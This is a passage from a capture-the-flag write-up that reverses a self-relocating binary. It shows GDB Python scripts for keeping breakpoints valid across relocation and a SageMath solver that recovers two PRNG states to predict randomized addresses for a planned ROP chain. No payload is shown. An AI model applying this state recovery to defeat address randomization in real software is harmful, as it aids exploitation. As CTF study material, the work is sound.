Cannot remove breakpoints because program is no longer writable.
Further execution is probably impossible.
0x00000000 in ?? ()
───[ BACKTRACE ]───
 ► f 0      0x0
   f 1      0x0
───────────────────

So what happens? Why do we get a segmentation fault, and what is this about removing breakpoints? Here is my understanding what happens (partially based on speculation, you should not count on this being true in details, please let me know if you have any corrections):

What GDB does when setting a breakpoint at an address (in our case 0x8049813, the first instruction of get_random), then the byte at that address is replaced by 0xCC, the opcode for int3. Execution of that instruction raises a SIGTRAP, and the program is stopped. GDB then replaces the int3 by the original byte at that spot and rewinds the instruction pointer by one instruction (so that it points to the instruction where we wanted to break and that we just repaired, as it was not executed yet). If we have more breakpoints, then likely GDB also repairs them so that everything looks normal when the user inspects memory. Then the user can do what they want and inspect the situation etc.. Once the user commands GDB to continue, GDB presumably steps a single instruction, and then adds in the 0xCC for all the breakpoints again, and then resumes execution.

Now in this case, we set a breakpoint to 0x8049813 so GDB places a int3 in that spot, replacing the previous PUSH EBP. The binary then runs, and in particular relocates the binary. The int3 is copied with everything else of course, but is now located at a different address, in this case 0xe1a10814. So far this does not cause a problem, and execution proceeds normally, and we can select the Get random values option from the menu. Once execution reached the int3 at 0xe1a10814, this causes a SIGTRAP, which GDB announces to us. Three lines below that we see 0xe1a10814 in ?? (). The address here is one higher than the address at which the int3 was located: this is the address of the next instruction to be executed (int3 has a one-byte encoding). Now GDB knows of a single breakpoint at 0x8049813, and none at 0xe1a10813, so it does not do anything with regards to 0xe1a10813, but tries to change the byte at 0x8049813 back to its original value so that everything looks normal if we were to inspect that part of memory. However, that address is now not mapped anymore! So GDB can not do that and hence does the sensible thing and informs us that

Cannot remove breakpoints because program is no longer writable.
Further execution is probably impossible.

Yet, we can still ask to continue. In itself this does not cause a problem. However, note that because GDB did not know of a breakpoint it manages at 0xe1a10813, it did not rewind the instruction pointer by one operation, and neither does it fix the byte at 0xe1a10813 (and how could it, it has no way of knowing what the value should be). Thus PUSH EBP was not executed and is thus missing on the stack. The execution can still continue as normal, as PUSH EBP is also encoded as just a single byte. But at the very end, one entry missing on the stack means that the wrong EBP and return address get popped from the stack, causing a segmentation fault when trying to return to that address. To confirm, we can after the SIGSEGV check whether int3 is still in that place, and it is:

pwndbg> disassemble 0xe1a10813, 0xe1a10818
Dump of assembler code from 0xe1a10813 to 0xe1a10818:
   0xe1a10813:  int3
   0xe1a10814:  mov    ebp,esp
   0xe1a10816:  push   edi
   0xe1a10817:  push   esi
End of assembler dump.

Automatically fixing breakpoints during relocation

In order to fix the problem just described, we can employ the following strategy. We set a breakpoint at exactly the instruction that passes execution from the old to the new copy of the binary. If we stop at that breakpoint, we remove all the breakpoints so far, and recreate them in the new copy. Additionally, there is one thing we must do before recreating the breakpoints: The old version of the binary had an int3 at the address of the breakpoint instead of the correct byte from the binary. This got copied over to the new version. When stopping, GDB recovers the previous byte at the old version of the binary, but does not do so for the new, copied version (because it does not know it as a breakpoint). We thus need to not only delete the breakpoint and add a new one, we also need to fix this byte in the copied version, before adding it as a new breakpoint.

Of course, we do not want to do this manually. The following Python script will thus do this for us, if we load it into GDB before executing the binary.

import gdb
import struct


binary_base_address = 0x08048000

def is_gdb_var_void(name):
    return gdb.parse_and_eval(name).type.code == gdb.TYPE_CODE_VOID


def to_uint(x):
    return int(x) % (1<<32)


def continue_event():
    gdb.execute('continue')


class BreakpointHandler:
    def __init__(self, offset, should_continue=False):
        global binary_base_address
        self._breakpoint = gdb.Breakpoint(f'*{binary_base_address + offset}')
        gdb.events.stop.connect(self._handle_stop_event)
        self.offset = offset
        self.should_continue = should_continue

    def _handle_stop_event(self, event):
        global binary_base_address
        if not isinstance(event, gdb.BreakpointEvent):
            return

        # Check if the breakpoint is valid. It might become invalid due to being
        # an event from an old, already deleted, breakpoint, and we get the event
        # only now because the RelocationHandler "continue"ed.
        if not event.breakpoints[0].is_valid():
            return

        bp_address = to_uint(event.breakpoints[0].locations[0].address)
        if bp_address - binary_base_address == self.offset:
            self.handle_stop_event(event)
            if self.should_continue:
                gdb.post_event(continue_event)


class RelocationHandler(BreakpointHandler):
    def __init__(self):
        super().__init__(0x120a, should_continue=True)
        self.other_breakpoints = []

    def handle_stop_event(self, event):
        global binary_base_address
        inferior = gdb.selected_inferior()

        old_base = int(gdb.parse_and_eval("*$edi")) % (1<<32)
        new_base = int(gdb.parse_and_eval("$esi")) % (1<<32)
        binary_base_address = new_base
    
        print(f'Relocating from 0x{old_base:08x} to 0x{new_base:08x}')
        
        my_address = binary_base_address + self.offset
        self.other_breakpoints = []

        for bp in gdb.breakpoints():
            bp_address = bp.locations[0].address
            #print(f'Breakpoint at {bp_address:08x}')
            # We delete the breakpoint in the old copy of the binary
            bp.delete()
            
            new_bp_address = bp_address - old_base + new_base
            new_bp_address_str = f'*{new_bp_address}'
            # The old version of the binary had an int3 at bp_address instead of the correct byte from the binary.
            # This got copied over to the new version. When stopping, GDB recovers the previous byte
            # at the old version of the binary, but does not do so for the new, copied version.
            # We thus need to not only delete the breakpoint and add a new one, we also need to
            # fix this byte in the copied version.
            inferior.write_memory(new_bp_address, inferior.read_memory(bp_address, 1))

            # Finally, add new breakpoint.
            if bp_address == my_address:
                self.breakpoint = gdb.Breakpoint(new_bp_address_str)
            else:
                self.other_breakpoints.append(gdb.Breakpoint(new_bp_address_str))

relocation_handler = RelocationHandler()

With this we have now bypassed the relocation issue and can more normally debug the binary with GDB. The situation is not quite as good as without relocations, because GDB’s knowledge of symbols does not survive the relocation, but in this case we do not have e.g. complicated data structures for which this would be a huge usability improvement.

Figuring out why the binary sometimes misunderstands our menu choice

During the contest, my script for recovering the PRNG states failed sometimes (less than half of the time), with a UnicodeDecodeError, due to the remote sending back a non-decodable byte. As the solution of just running it a second time was more efficient than spending time debugging this, I did not figure out what the cause for this was during the contest. But now we can look into this. Checking when the decoding error happens we can quickly see that the byte in question comes from the menu function, where the input we send gets repeated back to us:

memset((byte *)choice_str,0,5);
read_and_step(choice_str,3,'\n');
print(choice_str);

This is then usually followed by Unknown command\n, as is to be expected if the menu choice contains a random byte.

We can use the following script to debug this:

#!/usr/bin/env python3

import sys
import json
import pwnlib.context
import pwnlib.gdb
import pwnlib.tubes.process
import pwnlib.tubes.remote
from pwnlib.elf.elf import ELF

elf = ELF('./ifuckup')

terminalSetting = ["tmux", "new-window"]
pwnlib.context.context.clear(terminal=terminalSetting, binary=elf)

run_args = [elf.path]
gdbscript = '''
set $debug_unknown_command = 1
source ./unsetenv.gdb
source ./ifuckupgdb.py
continue
'''

io = pwnlib.gdb.debug(run_args, gdbscript=gdbscript)

def menu():
    return io.recvuntil(b'0. Quit\n')

def get_random():
    io.sendline(b'5')
    data = menu()
    if b"known" in data:
        print(data)
        io.interactive()
        quit()
    print(data.decode())
    return data


menu()
num_sent = 0
while True:
    new_data = get_random()
    num_sent += 1
    print(f'Number of get_random calls: {num_sent}')

This will repeatedly call the get_random function, and print the data we receive from the running process, but stop once we hit the Unknown command case. The output of the script will end something like this:

Number of get_random calls: 154
b'\xf4Unknown command\nMain Menu\n---------\n1. Display info\n2. Change random\n3. View state info\n4. Test stack smash\n5. Get random values\n-------\n0. Quit\n'

The number of calls until the error occurs is not constant, but is often in the range of a couple hundred. A guess we can make here is that it might occur on average every 256th call.

To understand why this might happen, we can start statically. The choice_str buffer, where the first byte evidently weirdly seems to be something different than expected at printout, is stored in the stack frame of the menu function:

                **************************************************************
                *                          FUNCTION                          *
                **************************************************************
                undefined menu()
undefined         AL:1           <RETURN>
undefined4        EDX:4          choice                                  XREF[1]:     08049661(W)  
undefined1        Stack[-0xc]:1  local_c                                 XREF[1]:     0804966b(*)  
char[5]           Stack[-0x11]:5 choice_str                              XREF[2]:     080495a9(*), 
                                                                                      08049658(R)  
undefined4        Stack[-0x2c]:4 local_2c                                XREF[9]:     080495cc(*), 
                                                                                      080495da(*), 
                                                                                      080495e8(*), 
                                                                                      080495f6(*), 
                                                                                      08049604(*), 
                                                                                      08049612(*), 
                                                                                      08049620(*), 
                                                                                      0804962e(*), 
                                                                                      08049650(*)  
                menu                                            XREF[2]:     entry:0804999f(c), 0804a538(*)  

One thing to immediately notice here is that choice_str is located at 0x11 below the top of the stack frame, so not doubleword-aligned. This means that the very first byte of choice_str is the most significant byte of the aligned doubleword that starts 0x14 below the top of the stack frame. As we can see in the code snippet below, the buffer first gets zeroed, then the read_and_step function gets called, and then it is printed out.

memset((byte *)choice_str,0,5);
read_and_step(choice_str,3,'\n');
print(choice_str);

It is thus likely that something weird happens in the read_and_step function, which looks as follows:

int read_and_step(char *buf,int max_num_to_read,char breakchar)
{
  int syscall_ret;
  int num_read;
  int i;
  char input_char;
  undefined4 uStack_14;
  
  num_read = 0;
  uStack_14 = 0x804943c;
  input_char = '\0';
  do {
    while (syscall_ret = syscall(3,0,&input_char,1,0,0,0), syscall_ret == -1) {
      if ((max_num_to_read <= num_read) || (input_char == breakchar)) goto LAB_0804948d;
    }
    if (input_char == breakchar) break;
    buf[num_read] = input_char;
    num_read = num_read + 1;
  } while (num_read < max_num_to_read);
LAB_0804948d:
  for (i = 0; i < num_read + -1; i = i + 1) {
    step_prng(prngs);
  }
  relocate();
  return num_read;
}

This in itself looks like it should, however a call to relocate happens at the end. Could that be the problem? Relocation changes addresses on the stack that look like pointers to the stack or binary to adjust them to the new addresses for the new mappings for stack and binary, so perhaps this is what happens? To check this we can use GDB. We add the following to our Python script loaded to GDB, in order to print out the crucial doubleword just before and after the call to relocate.

class ReadBeforeRelocateHandler(BreakpointHandler):
    def __init__(self):
        super().__init__(0x14ac, should_continue=True)

    def handle_stop_event(self, event):
        print('Handler for read, before relocation')
        value = to_uint(gdb.parse_and_eval("*(*(unsigned int **)($ebp) - 4)"))
        stack_pointer = to_uint(gdb.parse_and_eval("$esp"))
        print(f'Base address: 0x{binary_base_address:08x}, stack: 0x{stack_pointer:08x}, value: 0x{value:08x}')


class ReadAfterRelocateHandler(BreakpointHandler):
    def __init__(self):
        super().__init__(0x14b1, should_continue=True)

    def handle_stop_event(self, event):
        print('Handler for read, after relocation')
        value = to_uint(gdb.parse_and_eval("*(*(unsigned int **)($ebp) - 4)"))
        stack_pointer = to_uint(gdb.parse_and_eval("$esp"))
        print(f'Base address: 0x{binary_base_address:08x}, stack: 0x{stack_pointer:08x}, value: 0x{value:08x}')

if not is_gdb_var_void('$debug_unknown_command'):
    print('Setting breakpoints for debugging the unknown command bug')
    read_before_relocate_handler = ReadBeforeRelocateHandler()
    read_after_relocate_handler = ReadAfterRelocateHandler()

In GDB we then see output like the following:

Breakpoint 869, 0x6a8f84ac in ?? ()
Handler for read, before relocation
Base address: 0x6a8f7000, stack: 0xf82ed684, value: 0x358f8823

Breakpoint 868, 0x6a8f820a in ?? ()
Relocating from 0x6a8f7000 to 0xc8542000
Breakpoint 871 at 0xc854320a
Breakpoint 872 at 0xc85434ac
Breakpoint 873 at 0xc85434b1

Breakpoint 873, 0xc85434b1 in ?? ()
Handler for read, after relocation
Base address: 0xc8542000, stack: 0x57359684, value: 0x358f8823

Breakpoint 872, 0xc85434ac in ?? ()
Handler for read, before relocation
Base address: 0xc8542000, stack: 0x57359684, value: 0x35543823

Breakpoint 871, 0xc854320a in ?? ()
Relocating from 0xc8542000 to 0x35d74000
Breakpoint 874 at 0x35d7520a
Breakpoint 875 at 0x35d754ac
Breakpoint 876 at 0x35d754b1

Breakpoint 876, 0x35d754b1 in ?? ()
Handler for read, after relocation
Base address: 0x35d74000, stack: 0x15111684, value: 0x35543823

Breakpoint 875, 0x35d754ac in ?? ()
Handler for read, before relocation
Base address: 0x35d74000, stack: 0x15111684, value: 0x35d75823

Breakpoint 874, 0x35d7520a in ?? ()
Relocating from 0x35d74000 to 0x1148b000
Breakpoint 877 at 0x1148c20a
Breakpoint 878 at 0x1148c4ac
Breakpoint 879 at 0x1148c4b1

Breakpoint 879, 0x1148c4b1 in ?? ()
Handler for read, after relocation
Base address: 0x1148b000, stack: 0x09221684, value: 0x1148c823

Note that the output from before relocation always has 0x35 as the most significant byte, which corresponds to the character “5”. The output also confirms that our speculation was correct: Things fail exactly when the base address of the binary also happens to have most significant byte 0x35. The other three bytes are left over from previous function calls, so it seems there just happens to be left an address of the binary in that spot, where the first byte of our input then overwrites the most significant byte. Checking the corresponding offset in the binary, we see it is the address of the next instruction after the call to __i686.get_pc_thunk.bx in get_random, so in the previous call to get_random from the main loop in entry, the return address of this call happens to be placed in exactly the double word in which the first byte of our input is stored later.

                     get_random
08049813 55              PUSH       EBP
08049814 89 e5           MOV        EBP,ESP
08049816 57              PUSH       EDI
08049817 56              PUSH       ESI
08049818 be 01 00        MOV        count,0x1
         00 00
0804981d 53              PUSH       EBX
0804981e e8 df 01        CALL       __i686.get_pc_thunk.bx                           undefined __i686.get_pc_thunk.bx()
         00 00
08049823 81 c3 95        ADD        EBX,0x1e95
         1e 00 00

Collecting data to verify static reversing

We want to recover the internal state of the PRNGs from the Get random values menu option. For that it will be important that we understood step_prng and the relationship between it’s return value to the values actually printed correctly. For this we will generate some output directly from the binary, like this:

  1. We stop at the start of the get_random function, and extract the current state of the two PRNGs
  2. We stop near the end of the step_prng function and extract the value of result_uint.
  3. We stop in get_random a bit after the two spots in which step_prng is called, just after conversion of the return value to an integer, and extract that value.

The following stop handlers will do this for us, writing the data into a file debugdata.py in a way we can easily import later.

def read_uint(address):
    inferior = gdb.selected_inferior()
    return struct.unpack('<I', inferior.read_memory(address, 4).tobytes())[0]


def get_prng_states():
    inferior = gdb.selected_inferior()
    prngs_global = read_uint(binary_base_address + 0x36c4)
    result = []
    for num in (0,1):
        state_start = prngs_global + 0x44*num + 0x4
        rotation = read_uint(state_start - 4)
        state = []
        for i in range(0x10):
            state.append(read_uint(state_start + 4*i))
        result.append((rotation, tuple(state)))
    return tuple(result)


initial_prng0_state = None
initial_prng1_state = None
prng0_outputs_raw = []
prng0_outputs = []
prng1_outputs_raw = []
prng1_outputs = []


class GetRandomHandlerStart(BreakpointHandler):
    def __init__(self):
        super().__init__(0x1813, should_continue=True)

    def handle_stop_event(self, event):
        print('Handler for get_random start')
        global initial_prng0_state, initial_prng1_state
        global step_prng_handler
        step_prng_handler = PRNGHandlerResult()
        initial_prng0_state, initial_prng1_state = get_prng_states()


class GetRandomHandlerPRNG0(BreakpointHandler):
    def __init__(self):
        super().__init__(0x1881, should_continue=True)

    def handle_stop_event(self, event):
        print('Handler for get_random PRNG0')
        global prng0_outputs
        value = to_uint(gdb.parse_and_eval("*(unsigned int *)($esp)"))
        prng0_outputs.append(value)


class GetRandomHandlerPRNG1(BreakpointHandler):
    def __init__(self):
        super().__init__(0x18f1, should_continue=True)

    def handle_stop_event(self, event):
        print('Handler for get_random PRNG1')
        global prng1_outputs
        value = to_uint(gdb.parse_and_eval("*(unsigned int *)($ebp-0x38)"))
        prng1_outputs.append(value)


class GetRandomHandlerEnd(BreakpointHandler):
    def __init__(self):
        super().__init__(0x1925, should_continue=True)

    def handle_stop_event(self, event):
        print('Writing out collected data...')
        with open('./debugdata.py', 'w') as fh:
            fh.write(f'initial_prng0_state = {initial_prng0_state}\n')
            fh.write(f'initial_prng1_state = {initial_prng1_state}\n')
            fh.write(f'prng0_outputs_raw = {prng0_outputs_raw}\n')
            fh.write(f'prng0_outputs = {prng0_outputs}\n')
            fh.write(f'prng1_outputs_raw = {prng1_outputs_raw}\n')
            fh.write(f'prng1_outputs = {prng1_outputs}\n')


class PRNGHandlerResult(BreakpointHandler):
    def __init__(self):
        super().__init__(0x1ac9, should_continue=True)

    def handle_stop_event(self, event):
        print('Handler for step_prng')
        # result_uint is in EDI
        value = to_uint(gdb.parse_and_eval("(unsigned int)($edi)"))
        prng_address = to_uint(gdb.parse_and_eval("(unsigned int)($eax)"))
        prngs_global = read_uint(binary_base_address + 0x36c4)
        if prng_address == prngs_global:
            prng0_outputs_raw.append(value)
        elif prng_address == prngs_global + 0x44:
            prng1_outputs_raw.append(value)
        else:
            print(f'{prng_address:08x}')
            print(f'{prngs_global:08x}')
            raise Exception("PRNG that was argument to step_prng is not one of the two expected ones!")


if not is_gdb_var_void('$generate_debug_data'):
    print('Setting breakpoints to obtain PRNG debug data')
    get_random_start_handler = GetRandomHandlerStart()
    get_random_prng0_handler = GetRandomHandlerPRNG0()
    get_random_prng1_handler = GetRandomHandlerPRNG1()
    get_random_end_handler = GetRandomHandlerEnd()
    step_prng_handler = None

Using this together with the following script we can then gather data to test our understanding of the PRNGs and their relation to the output data.

#!/usr/bin/env python3

import pwnlib.context
import pwnlib.gdb
from pwnlib.elf.elf import ELF


elf = ELF('./ifuckup')

terminalSetting = ["tmux", "new-window"]
pwnlib.context.context.clear(terminal=terminalSetting, binary=elf)

run_args = [elf.path]
gdbscript = '''
set $generate_debug_data = 1
source ./unsetenv.gdb
source ./ifuckupgdb.py
continue
'''
io = pwnlib.gdb.debug(run_args, gdbscript=gdbscript)
io.recvuntil(b'0. Quit\n')
io.sendline(b'5')
io.recvuntil(b'0. Quit\n')
io.sendline(b'0')

We can then implement the PRNG as follows

import math

class PRNG:
    def __init__(self, state):
        # State is state' from the writeup, stored as 16 integers, each encoding 32 bits
        self.state = list(state)

    def step_raw(self):
        #print(f'State before step: {self.state}')
        tmp1 = (self.state[-1]) % (1<<32)
        tmp2 = ((self.state[0] << 0x10) ^ self.state[0] ^ self.state[0xd]) % (1<<32)
        tmp3 = ((self.state[9] >> 0xb) ^ self.state[9]) % (1<<32)
        tmp4 = (tmp2 ^ (self.state[0xd] << 0xf) ^ tmp3) % (1<<32)
        result_uint = ((tmp2 << 0x12) ^ (tmp1 << 2) ^ tmp1 ^ tmp3 ^ (tmp3 << 0x1c) ^ ((tmp4 & 0x6d22169) << 5)) % (1<<32)
        self.state[0] = tmp4
        self.state[-1] = result_uint
        self.state = self.state[-1:] + self.state[:-1]
        return result_uint

    def step_0(self):
        raw = self.step_raw()
        if raw == 0:
            return 0
        else:
            return raw - 1

    def step_1(self):
        return math.floor(self.step_raw() * (2**(-24) - 2**(-32)))

and then test this against the data obtained before using the following script.

#!/usr/bin/env python3

from prng import PRNG

def testrev():
    import debugdata
    prng0 = PRNG(debugdata.initial_prng0_state[1][debugdata.initial_prng0_state[0]:]
                 + debugdata.initial_prng0_state[1][:debugdata.initial_prng0_state[0]])
    prng1 = PRNG(debugdata.initial_prng1_state[1][debugdata.initial_prng1_state[0]:]
                 + debugdata.initial_prng1_state[1][:debugdata.initial_prng1_state[0]])

    # First we test that the raw outputs themselves are correct
    for prng0_raw in debugdata.prng0_outputs_raw:
        assert prng0_raw == prng0.step_raw()
    for prng1_raw in debugdata.prng1_outputs_raw:
        assert prng1_raw == prng1.step_raw()
    prng0 = PRNG(debugdata.initial_prng0_state[1][debugdata.initial_prng0_state[0]:]
                 + debugdata.initial_prng0_state[1][:debugdata.initial_prng0_state[0]])
    prng1 = PRNG(debugdata.initial_prng1_state[1][debugdata.initial_prng1_state[0]:]
                 + debugdata.initial_prng1_state[1][:debugdata.initial_prng1_state[0]])

    # Next we test whether we understand how the raw outputs lead to the actual values printed
    index_0 = 0
    index_1 = 0
    for count in range(1, 0x41):
        random_value = prng0.step_0()
        assert random_value == debugdata.prng0_outputs[index_0]
        index_0 += 1
        if (count & 7) != 0 and (count & 3) == 0:
            random_value = prng1.step_1()
            assert random_value == debugdata.prng1_outputs[index_1]
            index_1 += 1
            #print(f'Stepping PRNG0 {random_value} times')
            for _ in range(random_value):
                prng0.step_raw()
    print('Success!')

if __name__ == '__main__':
    testrev()

This will output Success!, confirming the understanding obtained from the static reversing described in the previous section was correct.

Solution

Via the Test stack smash menu option we can write a ROP chain onto the stack. To be able to construct a working ROP chain we will need to know some addresses though, and the binary relocates itself constantly to random addresses obtained from the two PRNGs. As the raw output bits of the PRNGs depend F_2-linearly on previous states2, and the Get random values provides us with outputs from the first PRNG, interspersed with gaps depending on outputs of the second PRNG, we can recover the PRNG states and thus predict future values.

Recovering the PRNG states

The internal state of the PRNGs that we wish to recover consist of 512 bits. Both state updates as well as the raw output bits (by this I mean the variable called result_uint in the reversing section) depend F_2-linearly on the state. Thus, if we know the value of the i-th bit of raw output of one of the PRNGs, after stepping j times previously, then this gives us a F_2-linear equation satisfied by the original state. The get_random menu option gives us bits of output of the first PRNG: We first get 4 consecutive outputs that leak (unless the value is 0) all 32 bits of raw output. Then there is a gap of up to 255 outputs we do not get, followed by 8 consecutive outputs, then there is another gap, and then another 8 consecutive outputs, and so on. 8 consecutive outputs of 32 bits give us 256 linear equations satisfied by the 512 bits of the original state. Guessing the length of the gap, we can then add another 256 linear equations from the next block of 8 consecutive outputs. With this bruteforce over 256 possible values for the gap, we thus have a simultaneous system of 512 F_2-linear equations satisfied by 512 unknowns. Usually, this linear system will not have full rank, so it does not fully determine the original state. However the probability of getting full rank, assuming random linear equations, is about 29%, and it is extremely unlikely that the rank would be smaller than 504. Thus, rather than bruteforcing over one further gap to use more output values, it is faster if we instead just bruteforce over the remaining indeterminancy, by trying all solutions of the linear system. Testing whether a solution is correct can be done by checking whether the next block of values occurs after a gap of no more than 255 values - this is very unlikely to happen by coincidence.

Having recovered the state of the first PRNG, we can then determine the precise length of the 8 gaps in the output at every call to get_random. While each gap is a 8-bit number, we on average learn 6 bits of information about the raw output of the PRNG from this (as explained in the reversing section). Thus each call to get_random allows us to learn about 48 bits of information about the second PRNG, so that we expect that roughly 11 calls should be enough to recover the state of the second PRNG as well.

The mathematics behind the PRNG solver I wrote at the contest is the same as the one here in this writeup, however everything was reimplemented from scratch. During the contest we glued the various scripts together, and due to the simulation-method used to predict the relevant binary address, this meant that the solution needed a SageMath and GDB setup at the same time. For this writeup I thus decided to make it possible to run the PRNG solver separately, by providing a simple interface over a network socket. This means it is possible to for example run the PRNG solver in a Docker container with SageMath, and have the script interacting with the binary/remote running elsewhere with e.g. a GDB setup as desired. Another advantage is that the PRNG solver can run some precomputations once and keep them in memory, and then use them multiple times when testing the interaction script (saving the startup delay for import sage.all is also not bad).

The first step in the PRNG solver is then to precompute, for each gap length from 0 to 255, the matrix that maps the original state to the sequence of raw bits the PRNG outputs, while skipping those that are part of the gap. For this it is most efficient to first compute the linear relations for 32*(8 + 255 + 8) successive raw output bits, and then construct the “gap matrices” from this by taking only a subset of the rows. Calculating the full matrix can be done as follows:

F = sage.all.GF(2)
V = F**512
GAP_MATRICES = None

def tuple_to_uint512(input_tuple):
    """Convert tuple of 16 32-bit integers to 512-bit wide integer."""
    bytes_repr = b"".join(struct.pack('>I', i) for i in input_tuple[::-1])
    return int.from_bytes(bytes_repr, byteorder='big')


def uint512_to_tuple(input_int):
    """Convert 512-bit wide integer to tuple of 16 32-bit integers."""
    bytes_repr = input_int.to_bytes(64, byteorder='big')
    return tuple(struct.unpack('>' + 'I'*16, bytes_repr))[::-1]


def uint32_to_bits(n):
    return [(n >> i) & 1 for i in range(32)]


def bits_to_uint(bits):
    return sum(x*(1<<i) for i, x in enumerate(bits))


def prng0_gap_matrices():
    # Each column contains the contribution of a particular bit of the original state
    # to the output bits.
    print('Calculating PRNG0 bit dependencies on original state...')
    columns = []
    for original_state_bit_num in tqdm(range(512)):
        prng = PRNG(uint512_to_tuple(1 << original_state_bit_num))
        column = []
        for prng0_step_num in range(16 + 256):
            output_raw = prng.step_raw()
            output_raw = uint32_to_bits(output_raw)
            column.extend(output_raw)
        columns.append(column)

    # This is the matrix A such that A * s will give successive bits of output,
    # if the original state was s (as a vector of bits).
    print('Constructing full matrix...')
    full_matrix = sage.all.matrix(F, columns).transpose()

We obtain the columns of the matrix we want by evaluating the outputs of the PRNG on states with only a single bit set.

Constructing a matrix from columns takes some time with Sage, so to obtain the gap matrices it is then more efficient to use the matrix_from_rows function on this full matrix than construct the gap matrices from their rows. We also precompute the kernels:

    print('Constructing gap matrices')
    gap_matrices = []
    for gap in tqdm(range(256)):
        # We do not get gap many 32 bit outputs in the middle - gap is the output of the second
        # PRNG, and the first one is advanced that often without printing the value.
        gap_matrix = full_matrix.matrix_from_rows(list(range(32*8)) + list(range(32*(8+gap), 32*(8+gap+8))))
        gap_matrices.append(gap_matrix)

    print('Calculating kernels')
    kernels = []
    for gap_matrix in tqdm(gap_matrices):
        kernels.append(gap_matrix.right_kernel().list())

    return gap_matrices, kernels

To use the data that is output from get_random for solving for the original state of the first PRNG, we first need to convert the values to the raw values (i.e. result_uint). This is simple: As we discussed earlier, if the output value is not 0, then we can obtain the raw value by adding 1. Should we get an output value of 0, then we can not know whether the raw value was 0 or 1, meaning we are missing one bit of information. Rather than implement this special case, I decided to just abort in that case, as this is very unlikely to happen.

def make_data_raw(output_data):
    data = []
    # We increase the values by one to undo the floating point stuff
    for get_random_block in output_data:
        data.append([])
        for between_gap_block in get_random_block:
            data[-1].append([])
            for value in between_gap_block:
                if value == 0:
                    raise ValueError("Can't recover raw value from 0!")
                data[-1][-1].append(value + 1)
    return data

For each possible gap length g we now have a “gap matrix” B_g. If the gap really was of length g, then the 512 raw output bits we obtained make up the components of a vector t that satisfies t = B_g * s, with s the original state of the first PRNG. To solve for all solutions s, we can first solve for one solution s_ and then consider all s = s_ + k with k an element in the kernel, i.e. such that B_g * k = 0. If the gap g we guessed was incorrect, then it can happen that there is no solution at all. But it also possible that there is a solution even though g is incorrect, and for the correct g we still do not know which element of the kernel is the correct one beforehand. To test which state is the correct state, we check whether a candidate state fits with the entire data we obtained, i.e. wheither the blocks of consecutive values appear as expected with gaps of at most 255 values. This is extremely unlikely to be the case for incorrect candidate states.

def solve_prng0(data):
    print('Trying to recover PRNG0 state...')
    result = None
    for gap in tqdm(range(256)):
        matrix = GAP_MATRICES[gap]
        bits_known = sum([uint32_to_bits(x) for x in data[0][0] + data[0][1]], [])
        v = sage.all.vector(F, bits_known)
        try:
            original_state_vector_ = matrix.solve_right(v)
        except ValueError as e:
            if 'matrix equation has no solutions' in str(e):
                continue
            raise
        for kernel_vector in GAP_MATRIX_KERNELS[gap]:
            original_state_vector = original_state_vector_ + kernel_vector
            original_state_bits = [int(b) for b in original_state_vector]
            original_state = [int(bits_to_uint(original_state_bits[32*i:32*(i+1)])) for i in range(0x10)]
            ret = extract_last_state_and_gaps(original_state, data)
            if ret is not None:
                return ret

    return result


def extract_last_state_and_gaps(state, data):
    prng = PRNG(state)
    gaps = []
    for get_random_block in data:
        gaps.append([])
        for j, between_gaps_block in enumerate(get_random_block):
            for i, value in enumerate(between_gaps_block):
                found = False
                for gap_length in range(256 + (3*256 if j == 0 else 0)):
                    if value == prng.step_raw():
                        found = True
                        break
                if not found:
                    return None
                if (gap_length != 0) and (i != 0):
                    return None
                if j != 0 and i == 0:
                    gaps[-1].append(gap_length)
    return (prng.state, gaps)

After we obtained the state for the first PRNG, we still need to find the state for the second PRNG. But now we are able to determine the 8 gaps in each of the get_random outputs, and as discussed this gives us about 48 linear equations for the original state of the second PRNG on average. If we repeatedly ask for get_random in the main menu, then between two such calls the second PRNG will be advanced three times in relocate called from read_and_step, in turn called from menu. Similarly to the first PRNG, we can precompute the relevant matrix for the second PRNG:

def prng1_full_matrix():
    '''Matrix in which each row is one bit of raw output in terms of the original 512 bits of state.
    For each output only the top 8 bits get rows, ordered from least significant to most significant.
    After 8 outputs, there is a gap of 3 outputs that are not represented at all.
    On average, we expect to use 6 bits out of the 8 bits. So we need on average about
    8/6 * 512, so about 683 rows. We thus prepare 2048, which is very unlikly to be insufficient.
    '''
    print('Calculating PRNG1 bit dependencies on original state...')
    columns = []
    for original_state_bit_num in tqdm(range(512)):
        prng = PRNG(uint512_to_tuple(1 << original_state_bit_num))
        column = []
        gap_num = 0
        while len(column) < 2048:
            output_raw = prng.step_raw()
            output_raw = uint32_to_bits(output_raw)[-8:]
            column.extend(output_raw)
            gap_num += 1
            if gap_num % 8 == 0:
                for _ in range(3):
                    prng.step_raw()
        columns.append(column)

    # This is the matrix A such that A * s will give successive bits of output,
    # if the original state was s (as a vector of bits).
    print('Constructing full matrix...')
    full_matrix = sage.all.matrix(F, columns).transpose()
    return full_matrix

This matrix contains rows for each of the top 8 bits of the raw outputs, leaving out the three steppings that happen in relocate. From the gaps lengths we can observe we can not in general determine all top 8 bits of the original raw output, but instead only obtain those bits that would not change when adding 1. The following function implements extraction of the relevant indices and solving for the original state:

def solve_prng1(gaps):
    # First we collect the bits information we have
    row_indices = []
    target = []
    row_index = 0
    for gap_block in gaps:
        for gap in gap_block:
            for bit_index in range(8):
                if ((gap >> bit_index) & 1) == (((gap + 1) >> bit_index) & 1):
                    row_indices.append(row_index)
                    target.append(F((gap >> bit_index) & 1))
                row_index += 1
    
    # We need at least 512 to recover the state. But the 512x512 matrix we
    # get might not have full rank. So let us go to 520.
    if len(target) < 520:
        return None

    print()
    print('Solving for original PRNG1 state vector...')
    target = sage.all.vector(target)
    matrix = PRNG1_MATRIX.matrix_from_rows(row_indices)
    original_state_bits = [int(b) for b in matrix.solve_right(target)]
    original_state = [int(bits_to_uint(original_state_bits[32*i:32*(i+1)])) for i in range(0x10)]
    print('Recovered original PRNG1 state')
    state = prng1_advance_state_checking_gaps(original_state, gaps)
    return state

To communicate with the interaction script, the PRNG solver listens to a port passed as an argument, after precomputing the relevant matrices:

def main():
    if len(sys.argv) != 2:
        print(f'{sys.argv[0]} PORT')
        sys.exit(1)

    print('===== PRECOMPUTATIONS =====')
    global GAP_MATRICES, GAP_MATRIX_KERNELS, PRNG1_MATRIX
    GAP_MATRICES, GAP_MATRIX_KERNELS = prng0_gap_matrices()
    PRNG1_MATRIX = prng1_full_matrix()
    print()

    print('===== SOLVER =====')
    server = pwnlib.tubes.server.server(int(sys.argv[1]))
    while True:
        io = server.next_connection()
        try:
            solver(io)
        except Exception as e:
            print(e)
    
 
if __name__ == '__main__':
    main()

